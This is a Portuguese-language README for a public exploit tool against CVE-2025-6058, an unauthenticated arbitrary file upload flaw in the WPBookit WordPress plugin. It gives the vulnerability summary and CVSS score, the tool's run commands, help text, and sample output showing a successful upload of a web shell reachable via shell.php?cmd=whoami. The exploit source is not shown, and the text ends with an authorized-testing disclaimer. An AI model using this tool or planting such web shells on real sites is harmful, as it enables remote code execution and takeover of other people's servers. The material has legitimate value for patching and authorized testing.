
WPBookit <= 1.0.4 - Upload Arbitrário de Arquivo Não Autenticado
O plugin WPBookit para WordPress é vulnerável a uploads arbitrários de arquivos devido à falta de validação do tipo de arquivo na função image_upload_handle(), que é vinculada através da rota add_booking_type em todas as versões até, e incluindo, 1.0.4.
Esta falha permite que atacantes não autenticados façam upload de arquivos arbitrários no servidor do site afetado, potencialmente levando à execução remota de código.
| CVE | CVSS Score | Divulgado Publicamente | Última Atualização |
|---|
| CVE-2025-6058 | 9.8 (Crítico) | 11 de Julho de 2025 | 12 de Julho de 2025 |
Este exploit automatiza o processo de:
python3 CVE-2025-6058.py -u http://target.com/wordpress
python3 CVE-2025-6058.py -u http://target.com/wordpress
python CVE-2025-6058.py -help
______ __ __ ________ ______ ______ ______ _______ ______ ______ _______ ______
/ \ / | / |/ | / \ / \ / \ / | / \ / \ / | / \
/$$$$$$ |$$ | $$ |$$$$$$$$/ /$$$$$$ |/$$$$$$ |/$$$$$$ |$$$$$$$/ /$$$$$$ |/$$$$$$ |$$$$$$$/ /$$$$$$ |
$$ | $$/ $$ | $$ |$$ |__ ______$$____$$ |$$$ \$$ |$$____$$ |$$ |____ ______ $$ \__$$/ $$$ \$$ |$$ |____ $$ \__$$ |
$$ | $$ \ /$$/ $$ |/ |/ $$/ $$$$ $$ | / $$/ $$ \ / |$$ \ $$$$ $$ |$$ \ $$ $$<
$$ | __ $$ /$$/ $$$$$/ $$$$$$//$$$$$$/ $$ $$ $$ |/$$$$$$/ $$$$$$$ |$$$$$$/ $$$$$$$ |$$ $$ $$ |$$$$$$$ | $$$$$$ |
$$ \__/ | $$ $$/ $$ |_____ $$ |_____ $$ \$$$$ |$$ |_____ / \__$$ | $$ \__$$ |$$ \$$$$ |/ \__$$ |$$ \__$$ |
$$ $$/ $$$/ $$ | $$ |$$ $$$/ $$ |$$ $$/ $$ $$/ $$ $$$/ $$ $$/ $$ $$/
$$$$$$/ $/ $$$$$$$$/ $$$$$$$$/ $$$$$$/ $$$$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/
Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited
usage: CVE-2025-6058.py [-h] -u URL
CVE-2025-6058 WPBookit <= 1.0.4 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)
options:
-h, --help mostrar esta mensagem de ajuda e sair
-u, --url URL URL alvo ex: http(s)://target.com/wordpress
[*] Verificando versão do plugin ...
[*] Explorando upload de arquivo ...
[+] Exploração bem-sucedida!
[+] Shell path: wp-content/uploads/2025/07/shell.php?cmd=whoami
Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited
Esta ferramenta é fornecida apenas para fins educacionais e de teste de segurança autorizado.
O autor não é responsável por qualquer uso indevido ou atividade não autorizada.
Use por sua conta e risco e sempre certifique-se de ter permissão para testar o sistema alvo.
Por: Khaled Alenazi (Nxploited)